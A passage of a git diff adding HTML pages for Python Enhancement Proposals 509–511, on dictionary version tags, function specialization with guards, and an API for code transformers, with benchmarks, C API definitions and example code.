  • Loop unrolling: to unroll the loop for i in range(...): ..., +guards on builtins.__dict__['range'] and globals()['range'] +are required
  • +
  • etc.
  • +
+
+
+

Pyjion

+

According of Brett Cannon, one of the two main developers of Pyjion, +Pyjion can benefit from dictionary version to implement optimizations.

+

Pyjion is a JIT compiler for +Python based upon CoreCLR (Microsoft .NET Core runtime).

+
+
+

Cython

+

Cython can benefit from dictionary version to implement optimizations.

+

Cython is an optimising static compiler for both +the Python programming language and the extended Cython programming +language.

+
+
+

Unladen Swallow

+

Even if dictionary version was not explicitly mentioned, optimizing +globals and builtins lookup was part of the Unladen Swallow plan: +“Implement one of the several proposed schemes for speeding lookups of +globals and builtins.” (source: Unladen Swallow ProjectPlan).

+

Unladen Swallow is a fork of CPython 2.6.1 adding a JIT compiler +implemented with LLVM. The project stopped in 2011: Unladen Swallow +Retrospective.

+
+
+
+

Changes

+

Add a ma_version_tag field to the PyDictObject structure with +the C type PY_UINT64_T, 64-bit unsigned integer. Add also a global +dictionary version.

+

Each time a dictionary is created, the global version is incremented and +the dictionary version is initialized to the global version.

+

Each time the dictionary content is modified, the global version must be +incremented and copied to the dictionary version. Dictionary methods +which can modify its content:

+
    +
  • clear()
  • +
  • pop(key)
  • +
  • popitem()
  • +
  • setdefault(key, value)
  • +
  • __delitem__(key)
  • +
  • __setitem__(key, value)
  • +
  • update(...)
  • +
+

The choice of increasing or not the version when a dictionary method +does not change its content is left to the Python implementation. A +Python implementation can decide to not increase the version to avoid +dictionary lookups in guards. Examples of cases when dictionary methods +don’t modify its content:

+
    +
  • clear() if the dict is already empty
  • +
  • pop(key) if the key does not exist
  • +
  • popitem() if the dict is empty
  • +
  • setdefault(key, value) if the key already exists
  • +
  • __delitem__(key) if the key does not exist
  • +
  • __setitem__(key, value) if the new value is identical to the +current value
  • +
  • update() if called without argument or if new values are identical +to current values
  • +
+

Setting a key to a new value equals to the old value is also considered +as an operation modifying the dictionary content.

+

Two different empty dictionaries must have a different version to be +able to identify a dictionary just by its version. It allows to verify +in a guard that a namespace was not replaced without storing a strong +reference to the dictionary. Using a borrowed reference does not work: +if the old dictionary is destroyed, it is possible that a new dictionary +is allocated at the same memory address. By the way, dictionaries don’t +support weak references.

+

The version increase must be atomic. In CPython, the Global Interpreter +Lock (GIL) already protects dict methods to make changes atomic.

+

Example using a hypothetical dict_get_version(dict) function:

+
>>> d = {}
+>>> dict_get_version(d)
+100
+>>> d['key'] = 'value'
+>>> dict_get_version(d)
+101
+>>> d['key'] = 'new value'
+>>> dict_get_version(d)
+102
+>>> del d['key']
+>>> dict_get_version(d)
+103
+
+
+

The field is called ma_version_tag, rather than ma_version, to +suggest to compare it using version_tag == old_version_tag, rather +than version <= old_version which becomes wrong after an integer +overflow.

+
+
+

Backwards Compatibility

+

Since the PyDictObject structure is not part of the stable ABI and +the new dictionary version not exposed at the Python scope, changes are +backward compatible.

+
+
+

Implementation and Performance

+

The issue #26058: PEP 509: Add ma_version_tag to PyDictObject contains a patch implementing +this PEP.

+

On pybench and timeit microbenchmarks, the patch does not seem to add +any overhead on dictionary operations. For example, the following timeit +micro-benchmarks takes 318 nanoseconds before and after the change:

+
python3.6 -m timeit 'd={1: 0}; d[2]=0; d[3]=0; d[4]=0; del d[1]; del d[2]; d.clear()'
+
+
+

When the version does not change, PyDict_GetItem() takes 14.8 ns for +a dictionary lookup, whereas a guard check only takes 3.8 ns. Moreover, +a guard can watch for multiple keys. For example, for an optimization +using 10 global variables in a function, 10 dictionary lookups costs 148 +ns, whereas the guard still only costs 3.8 ns when the version does not +change (39x as fast).

+

The fat module implements +such guards: fat.GuardDict is based on the dictionary version.

+
+
+

Integer overflow

+

The implementation uses the C type PY_UINT64_T to store the version: +a 64 bits unsigned integer. The C code uses version++. On integer +overflow, the version is wrapped to 0 (and then continues to be +incremented) according to the C standard.

+

After an integer overflow, a guard can succeed whereas the watched +dictionary key was modified. The bug only occurs at a guard check if +there are exactly 2 ** 64 dictionary creations or modifications +since the previous guard check.

+

If a dictionary is modified every nanosecond, 2 ** 64 modifications +takes longer than 584 years. Using a 32-bit version, it only takes 4 +seconds. That’s why a 64-bit unsigned type is also used on 32-bit +systems. A dictionary lookup at the C level takes 14.8 ns.

+

A risk of a bug every 584 years is acceptable.

+
+
+

Alternatives

+
+

Expose the version at Python level as a read-only __version__ property

+

The first version of the PEP proposed to expose the dictionary version +as a read-only __version__ property at Python level, and also to add +the property to collections.UserDict (since this type must mimic +the dict API).

+

There are multiple issues:

+
    +
  • To be consistent and avoid bad surprises, the version must be added to +all mapping types. Implementing a new mapping type would require extra +work for no benefit, since the version is only required on the +dict type in practice.
  • +
  • All Python implementations would have to implement this new property, +it gives more work to other implementations, whereas they may not use +the dictionary version at all.
  • +
  • Exposing the dictionary version at the Python level can lead the +false assumption on performances. Checking dict.__version__ at +the Python level is not faster than a dictionary lookup. A dictionary +lookup in Python has a cost of 48.7 ns and checking the version has a +cost of 47.5 ns, the difference is only 1.2 ns (3%):
    $ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd["33"] == 33'
    +10000000 loops, best of 3: 0.0487 usec per loop
    +$ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd.__version__ == 100'
    +10000000 loops, best of 3: 0.0475 usec per loop
    +
    +
    +
  • +
  • The __version__ can be wrapped on integer overflow. It is error +prone: using dict.__version__ <= guard_version is wrong, +dict.__version__ == guard_version must be used instead to reduce +the risk of bug on integer overflow (even if the integer overflow is +unlikely in practice).
  • +
+

Mandatory bikeshedding on the property name:

+
    +
  • __cache_token__: name proposed by Alyssa Coghlan, name coming from +abc.get_cache_token().
  • +
  • __version__
  • +
  • __version_tag__
  • +
  • __timestamp__
  • +
+
+
+

Add a version to each dict entry

+

A single version per dictionary requires to keep a strong reference to +the value which can keep the value alive longer than expected. If we add +also a version per dictionary entry, the guard can only store the entry +version (a simple integer) to avoid the strong reference to the value: +only strong references to the dictionary and to the key are needed.

+

Changes: add a me_version_tag field to the PyDictKeyEntry +structure, the field has the C type PY_UINT64_T. When a key is +created or modified, the entry version is set to the dictionary version +which is incremented at any change (create, modify, delete).

+

Pseudo-code of a fast guard to check if a dictionary key was modified +using hypothetical dict_get_version(dict) and +dict_get_entry_version(dict) functions:

+
UNSET = object()
+
+class GuardDictKey:
+    def __init__(self, dict, key):
+        self.dict = dict
+        self.key = key
+        self.dict_version = dict_get_version(dict)
+        self.entry_version = dict_get_entry_version(dict, key)
+
+    def check(self):
+        """Return True if the dictionary entry did not change
+        and the dictionary was not replaced."""
+
+        # read the version of the dictionary
+        dict_version = dict_get_version(self.dict)
+        if dict_version == self.version:
+            # Fast-path: dictionary lookup avoided
+            return True
+
+        # lookup in the dictionary to read the entry version
+        entry_version = get_dict_key_version(dict, key)
+        if entry_version == self.entry_version:
+            # another key was modified:
+            # cache the new dictionary version
+            self.dict_version = dict_version
+            self.entry_version = entry_version
+            return True
+
+        # the key was modified
+        return False
+
+
+

The main drawback of this option is the impact on the memory footprint. +It increases the size of each dictionary entry, so the overhead depends +on the number of buckets (dictionary entries, used or not used). For +example, it increases the size of each dictionary entry by 8 bytes on +64-bit system.

+

In Python, the memory footprint matters and the trend is to reduce it. +Examples:

+
    +
  • PEP 393 – Flexible String Representation
  • +
  • PEP 412 – Key-Sharing Dictionary
  • +
+
+
+

Add a new dict subtype

+

Add a new verdict type, subtype of dict. When guards are needed, +use the verdict for namespaces (module namespace, type namespace, +instance namespace, etc.) instead of dict.

+

Leave the dict type unchanged to not add any overhead (CPU, memory +footprint) when guards are not used.

+

Technical issue: a lot of C code in the wild, including CPython core, +expecting the exact dict type. Issues:

+
    +
  • exec() requires a dict for globals and locals. A lot of code +use globals={}. It is not possible to cast the dict to a +dict subtype because the caller expects the globals parameter +to be modified (dict is mutable).
  • +
  • C functions call directly PyDict_xxx() functions, instead of calling +PyObject_xxx() if the object is a dict subtype
  • +
  • PyDict_CheckExact() check fails on dict subtype, whereas some +functions require the exact dict type.
  • +
  • Python/ceval.c does not completely supports dict subtypes for +namespaces
  • +
+

The exec() issue is a blocker issue.

+

Other issues:

+
    +
  • The garbage collector has a special code to “untrack” dict +instances. If a dict subtype is used for namespaces, the garbage +collector can be unable to break some reference cycles.
  • +
  • Some functions have a fast-path for dict which would not be taken +for dict subtypes, and so it would make Python a little bit +slower.
  • +
+
+
+
+

Prior Art

+
+

Method cache and type version tag

+

In 2007, Armin Rigo wrote a patch to implement a cache of methods. It +was merged into Python 2.6. The patch adds a “type attribute cache +version tag” (tp_version_tag) and a “valid version tag” flag to +types (the PyTypeObject structure).

+

The type version tag is not exposed at the Python level.

+

The version tag has the C type unsigned int. The cache is a global +hash table of 4096 entries, shared by all types. The cache is global to +“make it fast, have a deterministic and low memory footprint, and be +easy to invalidate”. Each cache entry has a version tag. A global +version tag is used to create the next version tag, it also has the C +type unsigned int.

+

By default, a type has its “valid version tag” flag cleared to indicate +that the version tag is invalid. When the first method of the type is +cached, the version tag and the “valid version tag” flag are set. When a +type is modified, the “valid version tag” flag of the type and its +subclasses is cleared. Later, when a cache entry of these types is used, +the entry is removed because its version tag is outdated.

+

On integer overflow, the whole cache is cleared and the global version +tag is reset to 0.

+

See Method cache (issue #1685986) and Armin’s method cache +optimization updated for Python 2.6 (issue #1700288).

+
+
+

Globals / builtins cache

+

In 2010, Antoine Pitrou proposed a Globals / builtins cache (issue +#10401) which adds a private +ma_version field to the PyDictObject structure (dict type), +the field has the C type Py_ssize_t.

+

The patch adds a “global and builtin cache” to functions and frames, and +changes LOAD_GLOBAL and STORE_GLOBAL instructions to use the +cache.

+

The change on the PyDictObject structure is very similar to this +PEP.

+
+
+

Cached globals+builtins lookup

+

In 2006, Andrea Griffini proposed a patch implementing a Cached +globals+builtins lookup optimization. The patch adds a private +timestamp field to the PyDictObject structure (dict type), +the field has the C type size_t.

+

Thread on python-dev: About dictionary lookup caching +(December 2006).

+
+
+

Guard against changing dict during iteration

+

In 2013, Serhiy Storchaka proposed Guard against changing dict during +iteration (issue #19332) which +adds a ma_count field to the PyDictObject structure (dict +type), the field has the C type size_t. This field is incremented +when the dictionary is modified.

+
+
+

PySizer

+

PySizer: a memory profiler for Python, +Google Summer of Code 2005 project by Nick Smallbone.

+

This project has a patch for CPython 2.4 which adds key_time and +value_time fields to dictionary entries. It uses a global +process-wide counter for dictionaries, incremented each time that a +dictionary is modified. The times are used to decide when child objects +first appeared in their parent objects.

+
+
+
+

Discussion

+

Thread on the mailing lists:

+ +
+
+

Acceptance

+

The PEP was accepted on 2016-09-07 by Guido van Rossum. +The PEP implementation has since been committed to the repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0509.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0510/index.html b/pep-0510/index.html new file mode 100644 index 00000000000..ad23c14fae3 --- /dev/null +++ b/pep-0510/index.html @@ -0,0 +1,584 @@ + + + + + + + + PEP 510 – Specialize functions with guards | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 510 – Specialize functions with guards

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2016
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP was rejected by its author since the design didn’t show any +significant speedup, but also because of the lack of time to implement +the most advanced and complex optimizations.

+
+
+

Abstract

+

Add functions to the Python C API to specialize pure Python functions: +add specialized codes with guards. It allows to implement static +optimizers respecting the Python semantics.

+
+
+

Rationale

+
+

Python semantics

+

Python is hard to optimize because almost everything is mutable: builtin +functions, function code, global variables, local variables, … can be +modified at runtime. Implement optimizations respecting the Python +semantics requires to detect when “something changes”, we will call these +checks “guards”.

+

This PEP proposes to add a public API to the Python C API to add +specialized codes with guards to a function. When the function is +called, a specialized code is used if nothing changed, otherwise use the +original bytecode.

+

Even if guards help to respect most parts of the Python semantics, it’s +hard to optimize Python without making subtle changes on the exact +behaviour. CPython has a long history and many applications rely on +implementation details. A compromise must be found between “everything +is mutable” and performance.

+

Writing an optimizer is out of the scope of this PEP.

+
+
+

Why not a JIT compiler?

+

There are multiple JIT compilers for Python actively developed:

+ +

Numba is specific to numerical computation. Pyston and Pyjion are still +young. PyPy is the most complete Python interpreter, it is generally +faster than CPython in micro- and many macro-benchmarks and has a very +good compatibility with CPython (it respects the Python semantics). +There are still issues with Python JIT compilers which avoid them to be +widely used instead of CPython.

+

Many popular libraries like numpy, PyGTK, PyQt, PySide and wxPython are +implemented in C or C++ and use the Python C API. To have a small memory +footprint and better performances, Python JIT compilers do not use +reference counting to use a faster garbage collector, do not use C +structures of CPython objects and manage memory allocations differently. +PyPy has a cpyext module which emulates the Python C API but it has +worse performances than CPython and does not support the full Python C +API.

+

New features are first developed in CPython. In January 2016, the +latest CPython stable version is 3.5, whereas PyPy only supports Python +2.7 and 3.2, and Pyston only supports Python 2.7.

+

Even if PyPy has a very good compatibility with Python, some modules are +still not compatible with PyPy: see PyPy Compatibility Wiki. The incomplete +support of the Python C API is part of this problem. There are also +subtle differences between PyPy and CPython like reference counting: +object destructors are always called in PyPy, but can be called “later” +than in CPython. Using context managers helps to control when resources +are released.

+

Even if PyPy is much faster than CPython in a wide range of benchmarks, +some users still report worse performances than CPython on some specific +use cases or unstable performances.

+

When Python is used as a scripting program for programs running less +than 1 minute, JIT compilers can be slower because their startup time is +higher and the JIT compiler takes time to optimize the code. For +example, most Mercurial commands take a few seconds.

+

Numba now supports ahead of time compilation, but it requires decorator +to specify arguments types and it only supports numerical types.

+

CPython 3.5 has almost no optimization: the peephole optimizer only +implements basic optimizations. A static compiler is a compromise +between CPython 3.5 and PyPy.

+
+

Note

+

There was also the Unladen Swallow project, but it was abandoned in +2011.

+
+
+
+
+

Examples

+

Following examples are not written to show powerful optimizations +promising important speedup, but to be short and easy to understand, +just to explain the principle.

+
+

Hypothetical myoptimizer module

+

Examples in this PEP uses a hypothetical myoptimizer module which +provides the following functions and types:

+
    +
  • specialize(func, code, guards): add the specialized code code +with guards guards to the function func
  • +
  • get_specialized(func): get the list of specialized codes as a list +of (code, guards) tuples where code is a callable or code object +and guards is a list of a guards
  • +
  • GuardBuiltins(name): guard watching for +builtins.__dict__[name] and globals()[name]. The guard fails +if builtins.__dict__[name] is replaced, or if globals()[name] +is set.
  • +
+
+
+

Using bytecode

+

Add specialized bytecode where the call to the pure builtin function +chr(65) is replaced with its result "A":

+
import myoptimizer
+
+def func():
+    return chr(65)
+
+def fast_func():
+    return "A"
+
+myoptimizer.specialize(func, fast_func.__code__,
+                       [myoptimizer.GuardBuiltins("chr")])
+del fast_func
+
+
+

Example showing the behaviour of the guard:

+
print("func(): %s" % func())
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+print()
+
+import builtins
+builtins.chr = lambda obj: "mock"
+
+print("func(): %s" % func())
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+
+
+

Output:

+
func(): A
+#specialized: 1
+
+func(): mock
+#specialized: 0
+
+
+

The first call uses the specialized bytecode which returns the string +"A". The second call removes the specialized code because the +builtin chr() function was replaced, and executes the original +bytecode calling chr(65).

+

On a microbenchmark, calling the specialized bytecode takes 88 ns, +whereas the original function takes 145 ns (+57 ns): 1.6 times as fast.

+
+
+

Using builtin function

+

Add the C builtin chr() function as the specialized code instead of +a bytecode calling chr(obj):

+
import myoptimizer
+
+def func(arg):
+    return chr(arg)
+
+myoptimizer.specialize(func, chr,
+                       [myoptimizer.GuardBuiltins("chr")])
+
+
+

Example showing the behaviour of the guard:

+
print("func(65): %s" % func(65))
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+print()
+
+import builtins
+builtins.chr = lambda obj: "mock"
+
+print("func(65): %s" % func(65))
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+
+
+

Output:

+
func(): A
+#specialized: 1
+
+func(): mock
+#specialized: 0
+
+
+

The first call calls the C builtin chr() function (without creating +a Python frame). The second call removes the specialized code because +the builtin chr() function was replaced, and executes the original +bytecode.

+

On a microbenchmark, calling the C builtin takes 95 ns, whereas the +original bytecode takes 155 ns (+60 ns): 1.6 times as fast. Calling +directly chr(65) takes 76 ns.

+
+
+
+

Choose the specialized code

+

Pseudo-code to choose the specialized code to call a pure Python +function:

+
def call_func(func, args, kwargs):
+    specialized = myoptimizer.get_specialized(func)
+    nspecialized = len(specialized)
+    index = 0
+    while index < nspecialized:
+        specialized_code, guards = specialized[index]
+
+        for guard in guards:
+            check = guard(args, kwargs)
+            if check:
+                break
+
+        if not check:
+            # all guards succeeded:
+            # use the specialized code
+            return specialized_code
+        elif check == 1:
+            # a guard failed temporarily:
+            # try the next specialized code
+            index += 1
+        else:
+            assert check == 2
+            # a guard will always fail:
+            # remove the specialized code
+            del specialized[index]
+
+    # if a guard of each specialized code failed, or if the function
+    # has no specialized code, use original bytecode
+    code = func.__code__
+
+
+
+
+

Changes

+

Changes to the Python C API:

+
    +
  • Add a PyFuncGuardObject object and a PyFuncGuard_Type type
  • +
  • Add a PySpecializedCode structure
  • +
  • Add the following fields to the PyFunctionObject structure:
    Py_ssize_t nb_specialized;
    +PySpecializedCode *specialized;
    +
    +
    +
  • +
  • Add function methods:
      +
    • PyFunction_Specialize()
    • +
    • PyFunction_GetSpecializedCodes()
    • +
    • PyFunction_GetSpecializedCode()
    • +
    • PyFunction_RemoveSpecialized()
    • +
    • PyFunction_RemoveAllSpecialized()
    • +
    +
  • +
+

None of these function and types are exposed at the Python level.

+

All these additions are explicitly excluded of the stable ABI.

+

When a function code is replaced (func.__code__ = new_code), all +specialized codes and guards are removed.

+
+

Function guard

+

Add a function guard object:

+
typedef struct {
+    PyObject ob_base;
+    int (*init) (PyObject *guard, PyObject *func);
+    int (*check) (PyObject *guard, PyObject **stack, int na, int nk);
+} PyFuncGuardObject;
+
+
+

The init() function initializes a guard:

+
    +
  • Return 0 on success
  • +
  • Return 1 if the guard will always fail: PyFunction_Specialize() +must ignore the specialized code
  • +
  • Raise an exception and return -1 on error
  • +
+

The check() function checks a guard:

+
    +
  • Return 0 on success
  • +
  • Return 1 if the guard failed temporarily
  • +
  • Return 2 if the guard will always fail: the specialized code must +be removed
  • +
  • Raise an exception and return -1 on error
  • +
+

stack is an array of arguments: indexed arguments followed by (key, +value) pairs of keyword arguments. na is the number of indexed +arguments. nk is the number of keyword arguments: the number of (key, +value) pairs. stack contains na + nk * 2 objects.

+
+
+

Specialized code

+

Add a specialized code structure:

+
typedef struct {
+    PyObject *code;        /* callable or code object */
+    Py_ssize_t nb_guard;
+    PyObject **guards;     /* PyFuncGuardObject objects */
+} PySpecializedCode;
+
+
+
+
+

Function methods

+
+

PyFunction_Specialize

+

Add a function method to specialize the function, add a specialized code +with guards:

+
int PyFunction_Specialize(PyObject *func,
+                          PyObject *code, PyObject *guards)
+
+
+

If code is a Python function, the code object of the code function +is used as the specialized code. The specialized Python function must +have the same parameter defaults, the same keyword parameter defaults, +and must not have specialized code.

+

If code is a Python function or a code object, a new code object is +created and the code name and first line number of the code object of +func are copied. The specialized code must have the same cell +variables and the same free variables.

+

Result:

+
    +
  • Return 0 on success
  • +
  • Return 1 if the specialization has been ignored
  • +
  • Raise an exception and return -1 on error
  • +
+
+
+

PyFunction_GetSpecializedCodes

+

Add a function method to get the list of specialized codes:

+
PyObject* PyFunction_GetSpecializedCodes(PyObject *func)
+
+
+

Return a list of (code, guards) tuples where code is a callable or +code object and guards is a list of PyFuncGuard objects. Raise an +exception and return NULL on error.

+
+
+

PyFunction_GetSpecializedCode

+

Add a function method checking guards to choose a specialized code:

+
PyObject* PyFunction_GetSpecializedCode(PyObject *func,
+                                        PyObject **stack,
+                                        int na, int nk)
+
+
+

See check() function of guards for stack, na and nk arguments. +Return a callable or a code object on success. Raise an exception and +return NULL on error.

+
+
+

PyFunction_RemoveSpecialized

+

Add a function method to remove a specialized code with its guards by +its index:

+
int PyFunction_RemoveSpecialized(PyObject *func, Py_ssize_t index)
+
+
+

Return 0 on success or if the index does not exist. Raise an exception and +return -1 on error.

+
+
+

PyFunction_RemoveAllSpecialized

+

Add a function method to remove all specialized codes and guards of a +function:

+
int PyFunction_RemoveAllSpecialized(PyObject *func)
+
+
+

Return 0 on success. Raise an exception and return -1 if func is not +a function.

+
+
+
+

Benchmark

+

Microbenchmark on python3.6 -m timeit -s 'def f(): pass' 'f()' (best +of 3 runs):

+
    +
  • Original Python: 79 ns
  • +
  • Patched Python: 79 ns
  • +
+

According to this microbenchmark, the changes has no overhead on calling +a Python function without specialization.

+
+
+
+

Implementation

+

The issue #26098: PEP 510: Specialize functions with guards contains a patch which implements +this PEP.

+
+
+

Other implementations of Python

+

This PEP only contains changes to the Python C API, the Python API is +unchanged. Other implementations of Python are free to not implement new +additions, or implement added functions as no-op:

+
    +
  • PyFunction_Specialize(): always return 1 (the specialization +has been ignored)
  • +
  • PyFunction_GetSpecializedCodes(): always return an empty list
  • +
  • PyFunction_GetSpecializedCode(): return the function code object, +as the existing PyFunction_GET_CODE() macro
  • +
+
+
+

Discussion

+

Thread on the python-ideas mailing list: RFC: PEP: Specialized +functions with guards.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0510.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0511/index.html b/pep-0511/index.html new file mode 100644 index 00000000000..6d1f90927a7 --- /dev/null +++ b/pep-0511/index.html @@ -0,0 +1,757 @@ + + + + + + + + PEP 511 – API for code transformers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 511 – API for code transformers

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2016
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP was rejected by its author.

+

This PEP was seen as blessing new Python-like programming languages +which are close but incompatible with the regular Python language. It +was decided to not promote syntaxes incompatible with Python.

+

This PEP was also seen as a nice tool to experiment new Python features, +but it is already possible to experiment them without the PEP, only with +importlib hooks. If a feature becomes useful, it should be directly part +of Python, instead of depending on an third party Python module.

+

Finally, this PEP was driven was the FAT Python optimization project +which was abandoned in 2016, since it was not possible to show any +significant speedup, but also because of the lack of time to implement +the most advanced and complex optimizations.

+
+
+

Abstract

+

Propose an API to register bytecode and AST transformers. Add also -o +OPTIM_TAG command line option to change .pyc filenames, -o +noopt disables the peephole optimizer. Raise an ImportError +exception on import if the .pyc file is missing and the code +transformers required to transform the code are missing. code +transformers are not needed code transformed ahead of time (loaded from +.pyc files).

+
+
+

Rationale

+

Python does not provide a standard way to transform the code. Projects +transforming the code use various hooks. The MacroPy project uses an +import hook: it adds its own module finder in sys.meta_path to +hook its AST transformer. Another option is to monkey-patch the +builtin compile() function. There are even more options to +hook a code transformer.

+

Python 3.4 added a compile_source() method to +importlib.abc.SourceLoader. But code transformation is wider than +just importing modules, see described use cases below.

+

Writing an optimizer or a preprocessor is out of the scope of this PEP.

+
+

Usage 1: AST optimizer

+

Transforming an Abstract Syntax Tree (AST) is a convenient +way to implement an optimizer. It’s easier to work on the AST than +working on the bytecode, AST contains more information and is more high +level.

+

Since the optimization can done ahead of time, complex but slow +optimizations can be implemented.

+

Example of optimizations which can be implemented with an AST optimizer:

+ +

Using guards (see PEP 510), it is possible to +implement a much wider choice of optimizations. Examples:

+ +

The following issues can be implemented with an AST optimizer:

+
    +
  • Issue #1346238: A constant folding +optimization pass for the AST
  • +
  • Issue #2181: +optimize out local variables at end of function
  • +
  • Issue #2499: +Fold unary + and not on constants
  • +
  • Issue #4264: +Patch: optimize code to use LIST_APPEND instead of calling list.append
  • +
  • Issue #7682: +Optimisation of if with constant expression
  • +
  • Issue #10399: AST +Optimization: inlining of function calls
  • +
  • Issue #11549: +Build-out an AST optimizer, moving some functionality out of the +peephole optimizer
  • +
  • Issue #17068: +peephole optimization for constant strings
  • +
  • Issue #17430: +missed peephole optimization
  • +
+
+
+

Usage 2: Preprocessor

+

A preprocessor can be easily implemented with an AST transformer. A +preprocessor has various and different usages.

+

Some examples:

+ +

MacroPy has a long list of +examples and use cases.

+

This PEP does not add any new code transformer. Using a code transformer +will require an external module and to register it manually.

+

See also PyXfuscator: Python +obfuscator, deobfuscator, and user-assisted decompiler.

+
+
+

Usage 3: Disable all optimization

+

Ned Batchelder asked to add an option to disable the peephole optimizer +because it makes code coverage more difficult to implement. See the +discussion on the python-ideas mailing list: Disable all peephole +optimizations.

+

This PEP adds a new -o noopt command line option to disable the +peephole optimizer. In Python, it’s as easy as:

+
sys.set_code_transformers([])
+
+
+

It will fix the Issue #2506: Add +mechanism to disable optimizations.

+
+
+

Usage 4: Write new bytecode optimizers in Python

+

Python 3.6 optimizes the code using a peephole optimizer. By +definition, a peephole optimizer has a narrow view of the code and so +can only implement basic optimizations. The optimizer rewrites the +bytecode. It is difficult to enhance it, because it written in C.

+

With this PEP, it becomes possible to implement a new bytecode optimizer +in pure Python and experiment new optimizations.

+

Some optimizations are easier to implement on the AST like constant +folding, but optimizations on the bytecode are still useful. For +example, when the AST is compiled to bytecode, useless jumps can be +emitted because the compiler is naive and does not try to optimize +anything.

+
+
+
+

Use Cases

+

This section give examples of use cases explaining when and how code +transformers will be used.

+
+

Interactive interpreter

+

It will be possible to use code transformers with the interactive +interpreter which is popular in Python and commonly used to demonstrate +Python.

+

The code is transformed at runtime and so the interpreter can be slower +when expensive code transformers are used.

+
+
+

Build a transformed package

+

It will be possible to build a package of the transformed code.

+

A transformer can have a configuration. The configuration is not stored +in the package.

+

All .pyc files of the package must be transformed with the same code +transformers and the same transformers configuration.

+

It is possible to build different .pyc files using different +optimizer tags. Example: fat for the default configuration and +fat_inline for a different configuration with function inlining +enabled.

+

A package can contain .pyc files with different optimizer tags.

+
+
+

Install a package containing transformed .pyc files

+

It will be possible to install a package which contains transformed +.pyc files.

+

All .pyc files with any optimizer tag contained in the package are +installed, not only for the current optimizer tag.

+
+
+

Build .pyc files when installing a package

+

If a package does not contain any .pyc files of the current +optimizer tag (or some .pyc files are missing), the .pyc are +created during the installation.

+

Code transformers of the optimizer tag are required. Otherwise, the +installation fails with an error.

+
+
+

Execute transformed code

+

It will be possible to execute transformed code.

+

Raise an ImportError exception on import if the .pyc file of the +current optimizer tag is missing and the code transformers required to +transform the code are missing.

+

The interesting point here is that code transformers are not needed to +execute the transformed code if all required .pyc files are already +available.

+
+
+
+

Code transformer API

+

A code transformer is a class with ast_transformer() and/or +code_transformer() methods (API described below) and a name +attribute.

+

For efficiency, do not define a code_transformer() or +ast_transformer() method if it does nothing.

+

The name attribute (str) must be a short string used to identify +an optimizer. It is used to build a .pyc filename. The name must not +contain dots ('.'), dashes ('-') or directory separators: dots +are used to separated fields in a .pyc filename and dashes areused +to join code transformer names to build the optimizer tag.

+
+

Note

+

It would be nice to pass the fully qualified name of a module in the +context when an AST transformer is used to transform a module on +import, but it looks like the information is not available in +PyParser_ASTFromStringObject().

+
+
+

code_transformer() method

+

Prototype:

+
def code_transformer(self, code, context):
+    ...
+    new_code = ...
+    ...
+    return new_code
+
+
+

Parameters:

+
    +
  • code: code object
  • +
  • context: an object with an optimize attribute (int), the optimization +level (0, 1 or 2). The value of the optimize attribute comes from the +optimize parameter of the compile() function, it is equal to +sys.flags.optimize by default.
  • +
+

Each implementation of Python can add extra attributes to context. For +example, on CPython, context will also have the following attribute:

+
    +
  • interactive (bool): true if in interactive mode
  • +
+

XXX add more flags?

+

XXX replace flags int with a sub-namespace, or with specific attributes?

+

The method must return a code object.

+

The code transformer is run after the compilation to bytecode

+
+
+

ast_transformer() method

+

Prototype:

+
def ast_transformer(self, tree, context):
+    ...
+    return tree
+
+
+

Parameters:

+
    +
  • tree: an AST tree
  • +
  • context: an object with a filename attribute (str)
  • +
+

It must return an AST tree. It can modify the AST tree in place, or +create a new AST tree.

+

The AST transformer is called after the creation of the AST by the +parser and before the compilation to bytecode. New attributes may be +added to context in the future.

+
+
+
+

Changes

+

In short, add:

+
    +
  • -o OPTIM_TAG command line option
  • +
  • sys.implementation.optim_tag
  • +
  • sys.get_code_transformers()
  • +
  • sys.set_code_transformers(transformers)
  • +
  • ast.PyCF_TRANSFORMED_AST
  • +
+
+

API to get/set code transformers

+

Add new functions to register code transformers:

+
    +
  • sys.set_code_transformers(transformers): set the list of code +transformers and update sys.implementation.optim_tag
  • +
  • sys.get_code_transformers(): get the list of code +transformers.
  • +
+

The order of code transformers matter. Running transformer A and then +transformer B can give a different output than running transformer B an +then transformer A.

+

Example to prepend a new code transformer:

+
transformers = sys.get_code_transformers()
+transformers.insert(0, new_cool_transformer)
+sys.set_code_transformers(transformers)
+
+
+

All AST transformers are run sequentially (ex: the second transformer +gets the input of the first transformer), and then all bytecode +transformers are run sequentially.

+
+
+

Optimizer tag

+

Changes:

+
    +
  • Add sys.implementation.optim_tag (str): optimization tag. +The default optimization tag is 'opt'.
  • +
  • Add a new -o OPTIM_TAG command line option to set +sys.implementation.optim_tag.
  • +
+

Changes on importlib:

+
    +
  • importlib uses sys.implementation.optim_tag to build the +.pyc filename to importing modules, instead of always using +opt. Remove also the special case for the optimizer level 0 +with the default optimizer tag 'opt' to simplify the code.
  • +
